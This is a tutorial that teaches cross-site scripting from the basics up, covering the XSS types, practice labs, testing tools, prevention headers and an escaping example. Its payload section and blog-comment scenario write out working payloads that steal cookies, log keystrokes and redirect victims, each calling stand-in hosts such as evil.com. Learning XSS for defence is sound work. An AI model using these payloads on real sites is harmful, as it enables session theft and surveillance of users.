Learn Cross-Site Scripting (XSS) from Scratch – Beginner to Expert
1. Introduction to XSS
✅ What is Cross-Site Scripting (XSS)?
XSS is a web vulnerability that lets an attacker inject script into pages served by a trusted website, so that the script runs in other users' browsers with that site's origin and privileges.
✅ Why is XSS Dangerous?
It can compromise user data, steal sessions, impersonate users, or even spread malware.
✅ History & Importance
XSS has been consistently ranked in the OWASP Top 10 for web application vulnerabilities due to its impact and prevalence.
✅ Real-World Exploits
- MySpace worm (Samy)
- British Airways ticket hijacking
- eBay phishing redirections
2. How XSS Works
✅ Browsers render HTML + JavaScript as part of web content
✅ Vulnerable apps place user input into a page without sanitizing or encoding it
✅ Malicious scripts are injected into pages
✅ These scripts then execute in users' browsers
3. What Can an Attacker Do with XSS?
- Steal cookies / sessions
- Impersonate users
- Inject phishing forms
- Deliver malware
- Hijack user inputs
4. Types of XSS (With Examples)
a) Reflected XSS
The payload arrives in the request (form inputs, URLs, or search parameters) and is reflected straight back into the response page
Example:
http://example.com/search?q=<script>alert(1)</script>
b) Stored XSS
The payload is persisted (in a DB or server logs) and executes every time the stored data is rendered to a viewer
Example:
<script>alert('Stored XSS')</script>
c) DOM-Based XSS
Client-side JavaScript writes untrusted data into the DOM; the payload never needs to reach the server
Example:
// Vulnerable: the URL fragment is untrusted input written straight into an HTML sink
var name = location.hash.substring(1);
document.getElementById("output").innerHTML = name;
// Input: #<script>alert(1)</script>
5. Where to Practice XSS (Safe Labs)
| Platform | Purpose |
|---|---|
| DVWA | Beginner-friendly web app |
| bWAPP | Full-feature testbed |
| WebGoat | Official OWASP training app |
| XSS Game | Learn XSS through fun levels |
| PortSwigger Labs | Real-world XSS labs with explanations |
6. Tools for XSS Testing
- Burp Suite – Intercept & modify requests
- XSStrike – Advanced automated XSS scanner
- XSS Hunter – Track blind XSS payloads
- HackBar (Firefox/Chrome extension) – Test payloads quickly
- OWASP ZAP – Free, full-featured security scanner
7. XSS Payloads (Basic to Advanced)
Basic:
<script>alert('XSS')</script>
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
Steal Cookie:
<script>fetch('http://evil.com?cookie='+document.cookie)</script>
Redirect Victim:
<script>window.location='http://attacker.com'</script>
Keylogger:
<script>
document.onkeypress=function(e){
fetch('http://evil.com?key='+e.key)}
</script>
Explore more payloads on GitHub:
KIRAN-KUMAR-K3/vulnerability-payload-lists
8. Real-World Scenario (Example)
A blog allows users to comment, and the comment is rendered without sanitization or output encoding:
<textarea name="comment"></textarea>
An attacker submits:
<script>new Image().src='http://evil.com?c='+document.cookie</script>
Result: Every user who visits the comment section unknowingly leaks their session.
9. How to Prevent XSS
✅ Developer Best Practices:
- Sanitize inputs on both client & server
- Escape HTML entities (<, >, ", ', etc.)
- Avoid using innerHTML, document.write(), or unsafe evals
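The two practices above, escaping HTML entities and avoiding innerHTML, applied to this page's own cases (the stored blog comment from section 8 and the location.hash sink from section 4c). This is an added example, not code from the original page; escapeHtml, renderComment and renderHashName are names chosen here, and renderHashName accepts any object with a textContent property so it can run outside a browser.

```javascript
// Added example: output encoding and safe DOM sinks for the cases discussed above.

// The characters the page lists as needing escaping, plus '&' so that
// already-encoded text cannot be turned back into markup.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Encode untrusted text so the browser treats it as data, not markup.
// Each character is replaced once, so '&' is never double-escaped.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Server-side rendering of a stored comment (section 8): the escaped value
// is safe to embed as element text, so the cookie-stealing payload from the
// page is displayed literally instead of executing.
function renderComment(comment) {
  return `<div class="comment">${escapeHtml(comment)}</div>`;
}

// Constructed sample: the payload from section 8, as an attacker would submit it.
const SAMPLE_COMMENT =
  "<script>new Image().src='http://evil.com?c='+document.cookie</script>";

// DOM sink from section 4c, hardened: textContent never parses markup, so
// "#<img src=x onerror=alert(1)>" is shown as text rather than rendered.
// `el` is any object with a textContent property (a real element in a browser).
function renderHashName(el, hash) {
  const name = hash.startsWith("#") ? hash.slice(1) : hash;
  el.textContent = name; // not innerHTML
  return el.textContent;
}
```

In a real page, `el` would be `document.getElementById("output")` and `hash` would be `location.hash`; the only change from the vulnerable snippet is the sink.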
✅ HTTP Security Headers:
Content-Security-Policy: default-src 'self'
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
✅ Use Secure Frameworks:
- React – Escapes by default
- Django – Has built-in XSS protection
- Ruby on Rails – Auto-escapes outputs
10. Recommended Resources & Payloads
Learning Labs:
Payload Repository:
KIRAN-KUMAR-K3/vulnerability-payload-lists on GitHub
11. Conclusion & Learning Path
✅ XSS is powerful and highly common
✅ Learn the fundamentals before using tools
✅ Practice in legal and controlled environments
✅ Use responsibly to report bugs, not exploit users
✅ Keep contributing to a safer internet